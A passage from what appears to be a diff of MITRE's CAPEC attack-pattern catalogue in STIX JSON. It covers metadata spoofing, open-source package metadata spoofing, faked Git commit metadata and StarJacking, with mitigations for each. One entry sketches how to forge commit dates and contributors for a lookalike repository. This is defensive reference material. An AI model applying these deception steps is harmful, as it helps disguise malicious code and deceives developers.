to execution of malicious code.", + "id": "course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-7", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5813c2bd-b132-4bc7-ae4d-5c4b492c361e", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--d97a8953-bfba-4b9a-ab46-36c6b343b91a", + "target_ref": 
"attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Monitor traffic and resource usage and pay attention if resource exhaustion occurs.", + "id": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-8", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d245d4d1-c52c-41ba-aae5-782470e499d9", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fe9d8853-a306-4443-b34e-d9d755890734", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Protect your log file from unauthorized modification and log forging.", + "id": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-69-9", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66ca67c0-4eaa-438c-ba7f-8bbdd79867b4", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": 
"mitigates", + "source_ref": "course-of-action--94ece0ea-fea4-4009-86a0-589e49a5a8aa", + "target_ref": "attack-pattern--ca989a50-b24e-4917-a234-ce4788fa21c7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary alters the metadata of a resource (e.g., file, directory, repository, etc.) to present a malicious resource as legitimate/credible.\n ", + "external_references": [ + { + "external_id": "CAPEC-690", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/690.html" + } + ], + "id": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Metadata Spoofing", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_extended_description": "\n One approach to this attack entails the adversary altering a maliciously modified resource's metadata in order to hide their malicious activity. Another approach involves altering the metadata of an adversary-created resource to make the source appear more credible. Adversaries may spoof a variety of metadata across a number of resources, such as the following:\n \n Authors of Version Control System (VCS) repository commits\n Open source package statistics\n File attributes, such as when a file was last update\n \n The ultimate goal of a Metadata Spoofing attack is to trick victims into believing the malicious resource being provided originates from a reputable source. 
However, the victim instead leverages the malicious resource, which could result in a number of negative technical impacts.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_prerequisites": [ + "Identification of a resource whose metadata is to be spoofed" + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of metadata to convince victims the source is trusted" + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Validate metadata of resources such as authors, timestamps, and statistics.", + "id": "course-of-action--a09f8862-6d33-4065-b321-fd1fa118d277", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c218a980-8c1f-4985-9d6d-e70047973934", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a09f8862-6d33-4065-b321-fd1fa118d277", + "target_ref": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Confirm the pedigree of open source packages and ensure the code being downloaded does not originate from another source.", + "id": "course-of-action--5c539235-8420-419a-b630-aaeeb1370bb5", + "modified": 
"2022-09-29T00:00:00.000Z", + "name": "coa-690-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--daa28363-f6ed-4711-ba2e-706d0939d671", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5c539235-8420-419a-b630-aaeeb1370bb5", + "target_ref": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Even if the metadata is properly checked and a user believes it to be legitimate, there may still be a chance that they've been duped. 
Therefore, leverage automated testing techniques to determine where malicious areas of the code may exist.", + "id": "course-of-action--2bd8e827-da82-4f00-b0bc-af7a04bcb005", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-690-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2547b658-4e62-4ce1-a643-26751facc8f3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bd8e827-da82-4f00-b0bc-af7a04bcb005", + "target_ref": "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs open-source software metadata in an attempt to masquerade malicious software as popular, maintained, and trusted.\n ", + "external_references": [ + { + "external_id": "CAPEC-691", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/691.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Supply Chain Compromise: Compromise Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "Supply Chain Compromise: Compromise Software Supply Chain", + "external_id": "T1195.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/002" + } + ], + "id": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + 
"modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Open-Source Software Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--e9d5d2e4-588f-43c1-bc98-73417abbb727" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--582f33d6-0aa7-4f34-a91e-d767a65adad1", + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_child_of_refs": [ + "attack-pattern--cfbf9111-48a7-4432-b27f-ab6698bd2f30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary provides a malicious open-source library, claiming to provide extended logging features and functionality, and spoofs the metadata with that of a widely used legitimate library. The adversary then tricks victims into including this library in their underlying application. Once the malicious software is incorporated into the application, the adversary is able to manipulate and exfiltrate log data." + ], + "x_capec_extended_description": "\n Due to open-source software's popularity, it serves as a desirable attack-vector for adversaries since a single malicious component may result in the exploitation of numerous systems/applications. Adversaries may, therefore, spoof the metadata pertaining to the open-source software in order to trick victims into downloading and using their malicious software. 
Examples of metadata that may be spoofed include:\n \n Owner of the software (e.g., repository or package owner)\n Author(s) of repository commits\n Frequency of repository commits\n Date/Time of repository commits\n Package or Repository \"stars\"\n \n Once the malicious software component has been integrated into an underlying application or executed on a system, the adversary is ultimately able to achieve numerous negative technical impacts within the system/application. This often occurs without any indication of compromise.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_parent_of_refs": [ + "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596" + ], + "x_capec_peer_of_refs": [ + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf" + ], + "x_capec_prerequisites": [ + "Identification of a popular open-source component whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of software metadata to convince victims the source is trusted." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before downloading open-source software, perform precursory metadata checks to determine the author(s), frequency of updates, when the software was last updated, and if the software is widely leveraged.", + "id": "course-of-action--958d0282-f24d-4dda-ae92-2cdf628a4b77", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8abf4804-4411-465e-bc5d-bb9fdd630bee", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--958d0282-f24d-4dda-ae92-2cdf628a4b77", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Within package managers, look for conflicting or non-unique repository references to determine if multiple packages share the same repository reference.", + "id": "course-of-action--7513c2fc-b7ba-4bad-87ba-9e9f964178bd", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": 
"relationship--6da9df18-ac2f-482b-8ead-b6ea7bb31ffb", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--7513c2fc-b7ba-4bad-87ba-9e9f964178bd", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Reference vulnerability databases to determine if the software contains known vulnerabilities.", + "id": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--2e3a4d4f-a7fc-4640-8681-ce6e6af7ea36", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software from reputable hosting sites or package managers.", + "id": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + 
}, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0661cc78-7fa4-41ac-acaa-c68639e51727", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Only download open-source software that has been adequately signed by the developer(s). For repository commits/tags, look for the \"Verified\" status and for developers leveraging \"Vigilant Mode\" (GitHub) or similar modes.", + "id": "course-of-action--9c19f6cd-f83c-49c0-bd5c-2b6a8ecb12f2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6d5ef1f9-17a1-45d4-a389-8f63910fb111", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c19f6cd-f83c-49c0-bd5c-2b6a8ecb12f2", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "After downloading open-source software, ensure integrity values have not changed.", + "id": 
"course-of-action--2e0aa60e-0ea0-401d-800a-881f35742e84", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6522c681-96e4-4ab9-81fc-1661474dae8a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e0aa60e-0ea0-401d-800a-881f35742e84", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Before executing or incorporating the software, leverage automated testing techniques (e.g., static and dynamic analysis) to determine if the software behaves maliciously.", + "id": "course-of-action--a2b1e7b0-5eb8-41e4-bfda-7afcb3a8fbdb", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-691-6", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--b7779daf-fe78-439a-a305-b9872fd6e09c", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2b1e7b0-5eb8-41e4-bfda-7afcb3a8fbdb", + "target_ref": "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": 
"2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs metadata pertaining to a Version Control System (VCS) (e.g., Git) repository's commits to deceive users into believing that the maliciously provided software is frequently maintained and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-692", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/692.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Aviad Gershon, Unverified Commits: Are You Unknowingly Trusting Attackers’ Code?, 2022--07---15, Checkmarx", + "external_id": "REF-719", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/unverified-commits-are-you-unknowingly-trusting-attackers-code/" + }, + { + "description": "Deeba Ahmed, Hackers can spoof commit metadata to create false GitHub repositories, 2022--07---17, HackRead", + "external_id": "REF-720", + "source_name": "reference_from_CAPEC", + "url": "https://www.hackread.com/hackers-spoof-commit-metadata-false-github-repositories/" + } + ], + "id": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Spoof Version Control System Commit Metadata", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + 
"x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In July 2022, Checkmarx reported that GitHub commit metadata could be spoofed if unsigned commits were leveraged by the repository. Adversaries were able to spoof commit contributors, as well as the date/time of the commit. This resulted in commits appearing to originate from trusted developers and a GitHub activity graph that duped users into believing that the repository had been maintained for a significant period of time. The lack of commit metadata validation ultimately allowed adversaries to propagate malware to unsuspecting victims [REF-719] [REF-720]." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target: The adversary must first identify a target repository for them to spoof. Typically, this will be a popular and widely used repository, as to increase the amount of victims a successful attack will exploit.

Experiment

  1. Create malicious repository: The adversary must create a malicious repository that imitates the legitimate repository being spoofed. This may include creating a username that closely matches the legitimate repository owner; creating a repository name that closely matches the legitimate repository name; uploading the legitimate source code; and more.

  2. Spoof commit metadata: Once the malicious repository has been created, the adversary must then spoof the commit metadata to make the repository appear to be frequently maintained and originating from trusted sources.

  3. Techniques
    Git Commit Timestamps: The adversary generates numerous fake commits while setting the \"GIT_AUTHOR_DATE\" and \"GIT_COMMITTER_DATE\" environment variables to a date which is to be spoofed.
    Git Commit Contributors: The adversary obtains a legitimate and trusted user's email address and then sets this information via the \"git config\" command. The adversary can then commit changes leveraging this username.

Exploit

  1. Exploit victims: The adversary infiltrates software and/or system environments with the goal of conducting additional attacks.

  2. Techniques
    Active: The adversary attempts to trick victims into downloading the malicious software by means such as phishing and social engineering.
    Passive: The adversary waits for victims to download and leverage malicious software.
", + "x_capec_extended_description": "\n Version Control Systems are widely used by developers to host, track, and manage source code files in an easy and synchronous manner. These systems are often leveraged to host open-source software that other developers can incorporate into their own applications or use as standalone applications. To prevent downloading vulnerable and/or malicious code, developers will often check the metadata of VCS repository commits to determine the repository's overall pedigree. This may include a variety of information, such as the following:\n \n Owner of the repository\n Author(s) of commits\n Frequency of commits\n Date/Time of commits\n Repository activity graphs\n \n These precursory checks can assist developers in determining whether a trusted individual/organization is providing the source code, how often the code is updated, and the relative popularity of the software. However, an adversary can spoof this metadata to make a repository containing malicious code appear as originating from a trusted source, being frequently maintained, and being commonly used by other developers. Without performing additional security activities, unassuming developers may be duped by this spoofed metadata and include the malicious code within their systems/applications. The adversary is then ultimately able to achieve numerous negative technical impacts, while the victim remains unaware of any malicious activity.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Identification of a popular open-source repository whose metadata is to be spoofed." + ], + "x_capec_skills_required": { + "Medium": "Ability to spoof a variety of repository metadata to convince victims the source is trusted." 
+ }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e7ede74a-5958-4c35-81c2-b20c2ae72b84", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--958d0282-f24d-4dda-ae92-2cdf628a4b77", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--52c28138-05db-427b-826f-91b05c7feac4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2b940c94-f5be-4ab3-9bde-820843f3b48d", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6e084ced-2d86-4141-97a2-36ef7f526698", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--351a32e9-d4c3-45a9-91e8-3c37ee10071d", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e1d932a5-cb1e-454a-827e-2a04f9dd3162", + "modified": "2022-09-29T00:00:00.000Z", + 
"object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--9c19f6cd-f83c-49c0-bd5c-2b6a8ecb12f2", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0cca8249-8f72-4182-84f5-29a7522d98d6", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e0aa60e-0ea0-401d-800a-881f35742e84", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3367eda0-00c6-4f77-868b-eb58f728d80e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2b1e7b0-5eb8-41e4-bfda-7afcb3a8fbdb", + "target_ref": "attack-pattern--e6f66953-7512-4efd-be4c-0426a37374a9", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary spoofs software popularity metadata to deceive users into believing that a maliciously provided package is widely used and originates from a trusted source.\n ", + "external_references": [ + { + "external_id": "CAPEC-693", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": 
"http://cwe.mitre.org/data/definitions/494.html" + }, + { + "description": "Tzachi Zornstein, StarJacking – Making Your New Open Source Package Popular in a Snap, 2022--04---19, Checkmarx", + "external_id": "REF-721", + "source_name": "reference_from_CAPEC", + "url": "https://checkmarx.com/blog/starjacking-making-your-new-open-source-package-popular-in-a-snap/" + } + ], + "id": "attack-pattern--3d0d771e-5878-4476-b870-e1f28a0bd596", + "modified": "2022-09-29T00:00:00.000Z", + "name": "StarJacking", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--1ff15c87-da1d-4bd6-803f-4052b7b5cec7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Accountability": [ + "Hide Activities" + ], + "Authorization": [ + "Execute Unauthorized Commands", + "Alter Execution Logic", + "Gain Privileges" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Social Engineering", + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "In April 2022, Checkmarx reported that packages hosted on NPM, PyPi, and Yarn do not properly validate that the provided GitHub repository URL actually pertains to the package being provided. Combined with additional attacks such as TypoSquatting, this allows adversaries to spoof popularity metadata by associating popular 